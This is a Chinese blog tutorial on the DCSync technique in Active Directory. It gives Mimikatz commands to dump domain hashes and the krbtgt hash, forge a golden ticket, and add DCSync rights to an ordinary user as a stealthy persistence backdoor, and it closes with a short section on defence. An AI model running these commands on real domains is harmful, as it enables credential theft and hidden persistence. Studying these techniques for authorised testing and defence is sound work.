域内 dcsync 权限维持

最新推荐文章于 2024-06-19 15:22:30 发布
最新推荐文章于 2024-06-19 15:22:30 发布
阅读量1.1k 收藏 29
点赞数 17
文章标签: 安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hacker_zrq/article/details/139155418
版权

一、原理 

20210825125600.png

DCSync 是域渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。

Mimikatz的DCSync 功能:

该功能可以模仿一个域控制器,从真实的域控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆域控制器,即可远程通过域数据同步复制的方式获得域控制器上的的数据。

在默认情况下,只有 Administrators、Domain Controllers 和 Enterprise Domain Admins 组内的用户有权限使用 DCSync,但我们可以对域内普通用户添加 ACL (Access Control List) 实现普通用户也能调用 DCSync 功能。

权限维持思路:

        当获得了域内管理员权限,如果能修改域内普通用户的权限,使其具有DCSync权限的话,那么普通域用户也能导出域内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有域控主机账号和域管理员能Dcsync,域管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump域哈希。

二、实际操作

利用 DCSync 导出域内哈希

当我们获取相应的权限后,可以利用 DCSync 功能导出域内用户的哈希值。其原理就是利用 DRS (Directory Replication Service)协议通过 IDL_DRSGetNCChanges 从域控制器复制用户哈希凭据。获得了域内用户的哈希后可以进一步利用。

通过 Mimikatz导出【还有其他的方法】

在获取权限的域成员主机上执行如下:

# 导出域内指定用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /user:administrator 
lsadump::dcsync /domain:whoamianony.org /user:administrator /csv

# 导出域内所有用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /all    
lsadump::dcsync /domain:whoamianony.org /all /csv

利用 DCSync 制作黄金票据

在域渗透中,我们可以通过 DCSync 导出域控制器中 krbtgt 账户的哈希,并利用 krbtgt 账户的哈希制作黄金票据。

黄金票据的详情请看:《内网渗透测试:Kerberos协议相关安全问题分析与利用》

测试环境如下:

image-20210824221346483

假设攻击者已经拿下了内网主机 Windows 10,下面演示如何在内网中利用 DCSync 制作黄金票据来访问 DC 上的资源。

拿下 Windows 10 主机之后,我们加载 kiwi 模块:

load kiwi

image-20210824213230936

然后通过kiwi_cmd执行 Mimikatz 命令,使用 Mimikatz 的 DCSync 功能导出域控制器中 krbtgt 账户的哈希:

kiwi_cmd "lsadump::dcsync /domain:whoamianony.org /user:krbtgt"

image-20210824214421165

然后我们便可以通过 krbtgt 账户的哈希生成黄金票据了:

golden_ticket_create -u Administrator -d whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142 -k 6be58bfcc0a164af2408d1d3bd313c2a -t gold.tck

执行后生成的票据会咱是存放在你的 Kali 上,然后清空目标主机上的票据:

kerberos_ticket_purge

image-20210824215536411

最后使用kerberos_ticket_use注入刚才生成的票据即可:

kerberos_ticket_use gold.tck

image-20210824215648481

如上图所示,票据成功注入。此时,攻击者就可以利用 Windows 7 任意访问域控上的资源了:

dir \\DC\c$

image-20210824220003150

有了黄金票据之后的操作就简单了,懂得都懂!

利用 DCSync 进行域内权限维持

要想利用 DCSync 功能,得要拥有 Administrators、Domain Controllers 或 Enterprise Domain Admins 组内的用户权限,因此就让普通域用户拥有 DCSync 的操作权限,那么普通域用户也能导出域内用户的信息了,这样可以可以做一个隐蔽的后门进行权限维持。

具体做法就是为普通域用户添加三条 ACE 访问权限控制项,赋予任意以下任一用户的权限:

  • Domain Admins组内的用户
  • Enterprise Admins组内的用户

DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

我们可以通过 Empire 框架中的 PowerView.ps1 脚本实现:

Import-Module .\powerview.ps1
​
# 为域用户 whoami 添加以上三条 ACE
Add-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose

image-20210824235724341

三、DCSync 的防御

DCSync 攻击的原理是模拟域控制器与域控制器之间的数据同步复制。最好的防御方法是给控制器设置白名单,将可信任的资产设置在允许同步的白名单内。

除此之外,我们还应尝试枚举 Active Directory 中所有用户的 ACL 查询出所有特权帐户,检测域内被添加 DCSync 权限的用户。Github 上有一个项目 ACLight便提供了这样的功能,只需执行项目中的 Execute-ACLight2.bat,便会生成以下三个文件:

Privileged Accounts - Layers Analysis.txt

Privileged Accounts Permissions - Final Report.csv

Privileged Accounts Permissions - Irregular Accounts.csv

文件中会显示出所有特权帐户。

ad_m1n
关注
  • 17
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透(六十三)之滥用DCSync
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-06 881
中,不同的控之间,默认每隔15min就会进行一次数据同步。当一个额外的控想从其他控同步数据时,额外控会像其他控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像控发起数据同步请求,以获得指定控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。
内计算机和用户获取实现vbs代码
09-05
需要注意的是,执行这些操作可能需要适当的权限,通常需要拥有管理员级别的访问权限。此外,如果中包含大量对象,应考虑分页处理或使用更高效的方法以避免性能问题。 总结来说,VBScript提供了一种灵活且强大的...
利用DSCync进行权限维持
good good study
03-02 494
一个环境可以拥有多台控制器,每台控制器各自存储着一份所在的活动目录的可写副本,对目录的任何修改都可以从源控制器同步到本树或林中的其他控制器上。当一个控想从另一个控获取数据更新时,客户端控会向服务端控发送DSGetNCChanges请求,该请求的响应将包含客户端控必须应用到其他活动目录副本的一组更新。通过情况下,控制器之间每15分钟就会有一次数据同步。DCSync技术就是利用控制器同步的原理,通过DRS服务的某接口向控发起数据同步请求。
内网渗透之滥用DCSync
最新发布
2401_85027082的博客
06-19 671
中,不同的控之间,默认每隔15min就会进行一次数据同步。当一个额外的控想从其他控同步数据时,额外控会像其他控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像控发起数据同步请求,以获得指定控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。
环境权限维持Dcsync
good good study
04-19 1400
当获得了内管理员权限,如果能修改内普通用户的权限,使其具有DCSync权限的话,那么普通用户也能导出内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有控主机账号和管理员能Dcsync管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump哈希
权限维持】-DCsync
qq_41617902的博客
01-20 495
DCsync:模拟控制器并从控制器导出帐户密码hash
权限维持思路总结
技术超强的网络安全平台
12-06 580
当我们在渗透过程中通过艰辛的努力终于获取了目标主机权限后,我们接下来要做的往往是在目标机器上创建一个后门来维持住我们所获得的权限,否则一旦目标密码被改变或者漏洞被修补,那么就会导致我们对服务器权限的丢失。有了后门,我们就可以进出内网如若无人之境,所以权限维持的重要性可见一斑。Windows 操作系统常见持久性后门下面,我们先介绍几种常见的 Windows 系统后门,包括Windows系统隐藏用户、Shift粘粘键后门、注册表后门、Windows 计划任务、Windows 新服务后门、WMI后门等等。Wind
内网渗透测试:DCSync 攻击技术的利用
dzqxwzoe的博客
08-20 467
环境中,不同控制器(DC)之间,每 15 分钟都会有一次数据的同步。当一个控制器(DC 1)想从其他控制器(DC 2)获取数据时,DC 1 会向DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges接口向控发起数据同步请求。
权限维持方法浅析.pdf
08-08
前情提要& 本集简介 Golden Ticket Silver Ticket SID History SID History -Golden Ticket Now More GOLDEN! Directory Service Restore Mode (DSRM) DSRM -Pass The Hash&DCSync Malicious Security ...ACL -DCSync
权限维持方法技术解析.pdf
10-19
在IT领,特别是网络安全方面,了解权限维持方法至关重要,因为这关系到组织的数据安全和系统完整性。本文将深入解析几种关键的技术手段,包括Golden Ticket、Silver Ticket、SID历史、Directory Service Restore...
在块级作用内声明函数
06-02
关于ES6中let 和 const 命令的用法以及注意事项:中的报错的样式ES6 引入了块级作用,明确允许在块级作用之中声明函数。ES6 规定,块级作用之中,函数声明语句的行为类似于let,在块级作用之外不可引用。
权限维持方法技术解析.pptx
10-19
在IT领,特别是网络安全和系统管理中,"权限维持方法技术解析"是一个重要的主题,涉及到如何保护和管理企业网络中的Active Directory环境。Active Directory(AD)是Microsoft Windows网络操作系统的核心组件,...
权限维持(UserAccountControl属性滥用)
qq_18811919的博客
03-29 295
User-Account-Control属性滥用可以将普通机器账户修改为称为控,并拥有Dcsync功能导出用户Hash,DCShadow是创建恶意控然后利用,控间正常同步数据的功能将恶意控上的恶意对象同步到正在运行的正常控上
渗透之DCSYNC攻击
weixin_65550121的博客
12-09 1130
2015年八月份Mimikatz新增了一个主要功能叫做"Dcsync",使用这项技术可以有效的模拟控制器并从目标控上请求内用户的Hash,这项技术为当下渗透提供了极大的便利,可以直接远程dump内hash,另外也衍生出很多的攻击方式。在内,不同的控制器之间,每隔15分钟都会有一次数据的同步,当一个控制器想从其他控制器上面获取数据时,DC1会向DC2发起一个GetNCChanges请求,该请求的数据,包括需要同步的数据,如果需要同步的数据比较多,则会重复上面的过程。
权限维持(DCShadow)
qq_18811919的博客
03-21 305
本篇文章讲述了黄金票据+DCShadow以及psexec的相关利用, DCShadow是一种常见的维持手段是通过伪造成恶意DC进行, 同步进行进而权限维持
权限维持(重置DSRM密码与AdminSDHolder滥用)
qq_18811919的博客
03-25 712
本篇文章讲解内常见的权限维持手法的两种重置DSRM密码与AdminSDHolder滥用, 当然利用的姿势还有很多这里只是讲解了几种工具,下面我将写权限维持ACL滥用的 相关文章欢迎大家的支持。
权限维持2
wuxinweii的博客
12-06 418
利用黄金票据维持权限 环境: 1.控主机的管理员账户 2.内一台主机以及成员用户 一、导出krbtgt的NTLM hash,用来伪造黄金票据 lsadump::dcsync /domain:[名] /user:krbtgt 二、获取SID wmic useraccount get name,sid 三、获取当前用户的SID net group “domain adminis” /domain 四、获取内某个主机权限后,查看当前用户以及所诉组 net user wxw2 /domain
利用机器账户进行权限维持
渗透测试研究中心
09-02 676
0x00 前言机器帐户被许多技术用于权限提升和横向移动,但也有通过机器帐户建立权限持久性的情况。这涉及将任意机器帐户添加到特权组(例如管理员组)或修改机器帐户的userAccountControl属性中,使其转换为控制器。在这两种情况下,攻击者都可以通过机器帐户进行身份验证并执行特权操作,例如通过 DCSync 导出所有哈希等。@Sean Metcalf是第一个公开披露如何通过将机...
如何提升AD内的计算机权限
05-13
提升计算机权限需要在Active Directory(AD)中进行操作。以下是一些可能的方法: 1. 将计算机添加到更高的OU:将计算机移到更高的组织单元(OU)中,通常会提高它的权限。管理员可以通过Active Directory Users and Computers MMC控制台或PowerShell脚本进行此操作。 2. 使用组策略:通过组策略,管理员可以控制计算机上的许多设置和权限。可以使用组策略来提高计算机权限,例如授予用户本地管理员权限或允许访问某些重要的系统资源。 3. 授予用户本地管理员权限:管理员可以将用户添加到计算机上的本地管理员组中,从而提高其权限。这可以通过本地用户和组 MMC控制台或PowerShell脚本进行。 4. 使用委派:管理员可以使用委派来授权其他用户访问计算机或其资源。通过委派,管理员可以控制用户可以访问的资源以及他们可以执行的操作。 需要注意的是,提高计算机权限可能会增加安全风险,因此必须谨慎考虑,并确保只授权必要的权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ad_m1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值